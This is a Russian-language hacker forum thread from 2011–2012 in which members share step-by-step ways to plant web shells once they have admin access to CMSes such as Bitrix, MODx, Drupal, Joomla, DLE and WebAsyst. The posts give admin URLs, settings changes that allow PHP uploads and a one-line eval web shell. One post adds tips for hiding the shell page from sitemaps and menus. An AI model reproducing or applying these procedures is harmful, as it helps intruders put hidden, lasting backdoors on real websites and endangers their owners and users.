Старый 10.09.2011, 18:48   #21
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Почему то никто про Bitrix не написал, там есть выполнение php кода, собственно пруф:
http://site.ru/bitrix/admin/php_command_line.php?lang=ru
И профит.
Nightmare вне форума   Ответить с цитированием
Старый 11.09.2011, 01:31   #22
[Dark Green]
 
Регистрация: 06.07.2010
Сообщений: 15
Репутация: 38
По умолчанию

В дополнение к теме о Bitrix...

Офф. сайт: 1c-bitrix.ru
Версия: 10.0.1

Код:
site/bitrix/admin/iblock_element_edit.php?WF=Y&ID=[id]&type=books&lang=ru&IBLOCK_ID=[id]&find_section_section=[id]
Добавляем файл, заменяем вкладку "компьютер"(открыта по умолчанию) на "структура", юзаем импорт файлов, который в отличии от своих аналогов пропускает .php. Каталог выбираем сами)

PS: Nightmare, у битрикса куча редакций и версий)
[Dark Green] вне форума   Ответить с цитированием
Старый 26.09.2011, 02:07   #23
pres
 
Регистрация: 09.07.2010
Сообщений: 19
Репутация: 0
По умолчанию

Цитата:
Сообщение от Twost Посмотреть сообщение
CMS: LiveStreet
Site: http://livestreet.ru/

1) Статические страницы http://www.site.com/admin/pages/list/
2) Добавляем новую http://www.site.com/admin/pages/new/
3) В поле текст пишем


Это работает только, если установлен специальный хак http://livestreet.ru/blog/tips_and_tricks/2262.html
pres вне форума   Ответить с цитированием
Старый 13.10.2011, 12:36   #24
ont
 
Аватар для ont
 
Регистрация: 16.12.2010
Сообщений: 57
Репутация: 92
По умолчанию

MODx (evolution)
Первый способ:
Разрешаем загрузку файлов php в "инструменты" --> "конфигурация" --> "файл-менеджер" (добавляем расширение php). Заливаемся через "элементы" --> "управление файлами".

Второй способ:

Выполнение кода осуществляется через сниппеты.
  • элементы --> управление элементами --> сниппеты
  • создаем сниппет. Пусть его имя будет Snip. В коде сниппета пишем код php с тегами <?php ?>
  • добавляем сниппет в код любой страницы. Для этого отключаем визуальный редактор и вписываем в любое место html-кода (знаки ! запрещают MODx кэширование результата выполнения сниппета):
    Код:
    [!Snip!]
  • открываем сохраненную страницу в режиме просмотра и отправляем нужные POST/COOKIE параметры.
ont вне форума   Ответить с цитированием
Старый 25.10.2011, 14:36   #25
Svet
 
Аватар для Svet
 
Регистрация: 11.09.2010
Сообщений: 172
Репутация: 42
По умолчанию

Drupal 6
нужны права админа или околоадмина (то есть роль пользователя должна иметь возможность использовать вставки php-кода в контент)

http://site/admin/settings/filters/3 - тут смотреть настройки php input format
http://site/admin/user/roles - тут описание ролей и права
http://site/admin/user/user - список пользователей и их данные

В дампе БД смотреть таблицы:
users - данные пользователей.
user_roles - роли пользователей (не описание ролей, а именно у кого какие роли)
role, rules_rules - описания ролей

Заливки:
http://site/admin/build/block
Создаем новый блок.
В Input format выбираем php.
В Block body вводим код шелла (например, <?php @eval($_GET['e']); ?>).
Сохраняем. Теперь надо привязать блок к какому-то региону. Привязываем. Сохраняем. Профит.
Теперь на любой странице, где используется этот регион, можно будет использовать шелл (где какой регион используется, можно определить по их названиям).

http://site/node/add
Тут во многих разделах можно создавать файлы с PHP-кодом. Посмотрим на примере page:
http://site/node/add/page
Создаем новую страницу.
В Input format выбираем php.
В Body вводим код шелла.
В XML sitemap в Priority ставим Not in sitemap.
В Menu settings в Parent item ставим какую-нибудь отключенную ветку.
В URL path settings снимаем галочку с Automatic alias и в поле ввода пишем какой-нибудь замысловатый относительный(!) url.
Сохраняем. Готово.
Svet вне форума   Ответить с цитированием
Старый 25.01.2012, 03:52   #26
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

_ucms
админка — site/_ucms/
с проблемой справился так:
  1. заходим в «admin templates», выбираем любую категорию
  2. ставим галочку на «secure_gallery»
  3. переходим на вкладку «admin sections», выбираем раздел
  4. там где «secure image gallery» жмем, new image, грузим шелл, жмем view
  5. PROFIT
faza02 вне форума   Ответить с цитированием
Старый 26.01.2012, 18:51   #27
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от CyberHunter Посмотреть сообщение
Тестировал на: Joomla! 1.5
Требования: Доступ в админку.
Заходим в админку, находим там Global Configuration. Там же переходим на вкладку System. Находим Legal Extensions (File Types) и прописываем туда нужное расширения (т.е. php) и сохраняем.
Дальше заходим в Media Manager, выбираем папку для будущего шелла, открываем ее, выбираем файл который будем заливать (т.е. веб-шелл) нажимаем Start Upload File.
Шелл будет находится в папке images (по дефолту) или в той папке которую вы выбрали, типа: joomlasite.com/images/papka_s_shellom.
Работает на joomla! 1.5, но встречались не полные админки, в которых не было возможности заливать файлы (тупо не было такой кнопки), вот там и нет возможности залить шелл данным способом.
Check MIME Types еще надо отключать если включено, на вкладке System, и не забыть все на свое место поставить после всех действий.
}{оттабыч вне форума   Ответить с цитированием
Старый 27.01.2012, 00:48   #28
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

смотря какая dle
<=8.5

1. admin.php → статистические страницы → создаем любой новый (например system.html), показывать «только администраторам», в окно <?php eval($_GET[e]); ?>, выбираем «html без фильтрации», сохраняем
2. http://site.ru/[dlepath]/system.html
faza02 вне форума   Ответить с цитированием
Старый 29.01.2012, 17:28   #29
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

WebAsyst
у Konqi в видео, показано, как залить через редактирование шаблона, но сегодня попалась версия, где пхп код не исполнялся.
  1. нужны права админа, заходим в site/system/
  2. жмем «магазин», далее — «настройки»
  3. выбираем «альтернативы оформлению заказа»
  4. включаем «PayPal Website Payments Pro - Express Checkout»
  5. где «сертификат paypal» выбираем наш шелл, жмем сохранить
  6. наш шелл по адресу site/data/SHOP/attachments/SC/temp/shell.php
faza02 вне форума   Ответить с цитированием
Старый 21.02.2012, 23:04   #30
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию Drupal 6

Сегодня попался Друпал, где нельзя было просто "написать" php код в теле страницы.
Решение:
1) admin/settings/uploads, в поле "Default permitted file extensions" добавляем нужное нам расширение (например, php3)
2) admin/settings/file-system, смотрим File system path, по умолчанию это sites/default/files. Т.к. php файлы, залитые в эту папку, при обращении к ним просто предлагается скачать, благодаря htaccess, лежащему в этой папке, меняем это значение на sites/default/. Сохраняем.
3) идем node/add/page, выбираем добавление файла "File attachments", заливаем наш шелл, видим ссылку вида "http://drupal6/sites/default/shell.php3"


Drupal 7:
1) активируем модуль "Update manager"
2) на этой же странице выбираем "Install new module"
3) заливаем архив
4) шелл будет по адресу http://drupal7/sites/all/modules/shell/tests/wso.php

PS Перезалейте кто-нибудь на сервер архив, у меня прав нет
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 22.02.2012 в 16:06.. Причина: добавлен Drupal 7
nomad вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot